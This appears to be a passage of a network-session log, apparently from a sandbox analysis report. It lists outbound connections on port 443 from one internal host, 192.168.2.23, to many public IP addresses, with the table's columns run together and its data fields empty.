                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15732192.168.2.2359346182.25.137.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15733192.168.2.2349940180.213.54.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15734192.168.2.2341118139.58.241.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15735192.168.2.2337294205.4.92.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15736192.168.2.2350748120.124.225.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15737192.168.2.234715060.211.186.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15738192.168.2.2356248114.5.107.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15739192.168.2.235373659.137.224.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15740192.168.2.234501476.186.229.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15741192.168.2.2349916210.138.124.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15742192.168.2.2352856115.198.4.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15743192.168.2.2346564117.156.209.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15744192.168.2.234859047.153.31.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15745192.168.2.2339472158.153.71.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15746192.168.2.234585280.130.171.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15747192.168.2.2337212205.112.177.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15748192.168.2.23477028.211.239.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15749192.168.2.2358162147.97.198.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15750192.168.2.2357910123.149.13.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15751192.168.2.234501039.150.231.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15752192.168.2.235403497.135.243.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15753192.168.2.233439265.97.156.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15754192.168.2.233285824.48.95.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15755192.168.2.2356320167.205.40.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15756192.168.2.233478039.85.194.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15757192.168.2.235115485.140.138.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15758192.168.2.2351666217.24.155.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15759192.168.2.2341444159.103.116.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15760192.168.2.235735031.181.18.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15761192.168.2.235920493.18.85.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15762192.168.2.233514072.214.208.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15763192.168.2.2346250191.38.62.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15764192.168.2.234556854.225.40.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15765192.168.2.2356100213.187.171.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15766192.168.2.2339136193.239.250.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15767192.168.2.233638823.241.243.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15768192.168.2.2355846196.234.41.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15769192.168.2.234102450.185.13.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15770192.168.2.235915692.210.175.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15771192.168.2.234362495.10.170.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15772192.168.2.2332798171.71.156.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15773192.168.2.233705680.242.219.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15774192.168.2.2344678223.84.243.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15775192.168.2.2358924121.248.149.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15776192.168.2.2341132206.211.6.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15777192.168.2.23417025.105.13.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15778192.168.2.2345780177.175.137.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15779192.168.2.235165885.162.147.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15780192.168.2.2344050176.138.202.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15781192.168.2.2338770139.221.158.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15782192.168.2.234340492.126.222.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15783192.168.2.235001432.185.70.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15784192.168.2.2353102147.199.206.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15785192.168.2.236009439.221.200.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15786192.168.2.2338064165.49.248.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15787192.168.2.235591695.7.168.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15788192.168.2.234688866.91.47.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15789192.168.2.2343944126.114.83.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15790192.168.2.236075440.166.48.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15791192.168.2.2340614166.204.57.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15792192.168.2.233400880.190.95.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15793192.168.2.233711854.69.60.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15794192.168.2.233509443.202.123.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15795192.168.2.235921897.151.154.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15796192.168.2.2337384112.185.233.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15797192.168.2.2357506160.200.199.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15798192.168.2.235905865.63.250.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15799192.168.2.2352334167.92.243.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15800192.168.2.233602267.163.110.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15801192.168.2.2357488105.250.146.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15802192.168.2.2350572107.123.216.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15803192.168.2.2358866197.31.36.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15804192.168.2.233740241.126.88.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15805192.168.2.234661645.30.9.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15806192.168.2.2334006201.234.174.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15807192.168.2.235012220.143.226.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15808192.168.2.2340016186.61.208.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15809192.168.2.2348484221.170.225.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15810192.168.2.2353174222.27.250.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15811192.168.2.2350878192.249.209.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15812192.168.2.234241259.108.45.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15813192.168.2.235537439.26.96.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15814192.168.2.2360286111.213.214.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15815192.168.2.2357644193.200.186.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15816192.168.2.2353040189.105.224.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15817192.168.2.234467624.175.225.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15818192.168.2.235387443.156.104.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15819192.168.2.235622852.27.203.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15820192.168.2.235013234.186.185.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15821192.168.2.2349086130.124.193.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15822192.168.2.234378689.228.225.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15823192.168.2.235992824.178.246.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15824192.168.2.235044699.139.247.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15825192.168.2.2344904147.89.173.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15826192.168.2.233339418.249.132.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15827192.168.2.235597625.49.91.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15828192.168.2.235297025.219.96.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15829192.168.2.2339916189.54.39.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15830192.168.2.233653425.236.240.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15831192.168.2.2346746213.136.39.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15832192.168.2.234605695.146.185.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15833192.168.2.235559823.143.203.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15834192.168.2.2336038220.227.225.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15835192.168.2.235743689.36.57.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15836192.168.2.2357212119.154.147.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15837192.168.2.235478432.58.197.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15838192.168.2.2338364218.191.213.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15839192.168.2.2359658202.97.147.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15840192.168.2.2353538218.64.152.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15841192.168.2.2343808108.55.40.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15842192.168.2.2337410113.150.241.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15843192.168.2.235408293.3.249.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15844192.168.2.234510691.233.75.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15845192.168.2.234098439.125.24.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15846192.168.2.234857631.243.97.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15847192.168.2.234456436.2.195.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15848192.168.2.2347896223.165.146.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15849192.168.2.2338908150.55.235.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15850192.168.2.2358166111.228.139.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15851192.168.2.233561414.135.53.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15852192.168.2.23356569.87.220.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15853192.168.2.2339696158.201.94.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15854192.168.2.233350687.67.71.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15855192.168.2.2348806140.219.234.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15856192.168.2.234938672.1.9.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15857192.168.2.2333732196.136.61.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15858192.168.2.2360690101.99.76.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15859192.168.2.235210614.0.246.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15860192.168.2.2346228106.252.155.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15861192.168.2.234662617.171.167.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15862192.168.2.2350198143.235.25.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15863192.168.2.2334840132.54.131.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15864192.168.2.233799623.156.179.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15865192.168.2.2351544136.32.120.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15866192.168.2.235145888.203.24.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15867192.168.2.2355860104.202.44.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15868192.168.2.2358000198.202.187.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15869192.168.2.234829489.160.115.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15870192.168.2.2337576195.170.153.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15871192.168.2.2353412116.37.230.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15872192.168.2.2332770159.193.144.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15873192.168.2.2347072179.252.132.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15874192.168.2.234033873.205.23.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15875192.168.2.234817881.163.253.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15876192.168.2.2340848219.172.153.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15877192.168.2.2343464132.106.23.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15878192.168.2.233701879.119.116.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15879192.168.2.235839878.41.89.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15880192.168.2.2351850107.73.11.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15881192.168.2.2359972145.39.10.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15882192.168.2.233486481.32.110.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15883192.168.2.2354854162.130.171.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15884192.168.2.233766075.16.149.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15885192.168.2.2333516138.208.33.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15886192.168.2.236076270.129.147.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15887192.168.2.2344576200.49.6.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15888192.168.2.235260899.194.35.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15889192.168.2.235812663.15.254.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15890192.168.2.234708027.9.24.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15891192.168.2.2337452113.233.230.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15892192.168.2.234643662.201.90.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15893192.168.2.2352800182.39.140.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15894192.168.2.2337638172.55.155.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15895192.168.2.2345046168.214.80.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15896192.168.2.2348508126.120.123.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15897192.168.2.2356796140.81.51.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15898192.168.2.2340170155.43.50.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15899192.168.2.234191899.169.72.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15900192.168.2.2358762125.48.64.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15901192.168.2.235126834.180.51.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15902192.168.2.234176266.246.57.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15903192.168.2.2355742162.94.15.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15904192.168.2.2336508133.78.56.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15905192.168.2.234028270.230.146.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15906192.168.2.2352736183.15.82.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15907192.168.2.233921693.130.212.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15908192.168.2.2355834167.205.67.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15909192.168.2.2357838187.151.200.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15910192.168.2.234514045.201.193.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15911192.168.2.2338352212.181.80.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15912192.168.2.2338662124.44.193.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15913192.168.2.234229865.216.23.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15914192.168.2.2348422212.191.122.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15915192.168.2.235864438.222.87.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15916192.168.2.234142691.44.201.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15917192.168.2.234769635.48.204.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15918192.168.2.234582089.35.194.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15919192.168.2.236074849.70.149.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15920192.168.2.2344812221.42.192.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15921192.168.2.2355336217.192.12.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15922192.168.2.2356734174.219.76.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15923192.168.2.235284220.125.23.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15924192.168.2.2337518184.176.92.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15925192.168.2.2360106152.41.177.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15926192.168.2.235157073.47.191.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15927192.168.2.2348546104.179.130.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15928192.168.2.2352378177.9.5.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15929192.168.2.235670231.176.149.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15930192.168.2.2343110210.123.122.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15931192.168.2.2343602150.92.226.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15932192.168.2.23472288.246.169.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15933192.168.2.2350450219.202.21.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15934192.168.2.2343648118.204.38.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15935192.168.2.2355066138.154.165.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15936192.168.2.2348436121.197.90.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15937192.168.2.2337386110.254.42.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15938192.168.2.234588480.143.104.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15939192.168.2.2352652159.196.234.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15940192.168.2.2355048168.91.18.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15941192.168.2.2357912201.73.118.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15942192.168.2.234124225.139.8.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15943192.168.2.2360550177.247.200.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15944192.168.2.2348970204.255.51.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15945192.168.2.2352834185.49.79.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15946192.168.2.2339190207.156.254.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15947192.168.2.2344446138.126.31.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15948192.168.2.2358876157.15.155.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15949192.168.2.2347024120.245.5.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15950192.168.2.233522275.240.59.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15951192.168.2.234722681.113.230.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15952192.168.2.2349836102.171.59.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15953192.168.2.2337144156.106.40.43443
                                                TimestampBytes transferredDirectionData


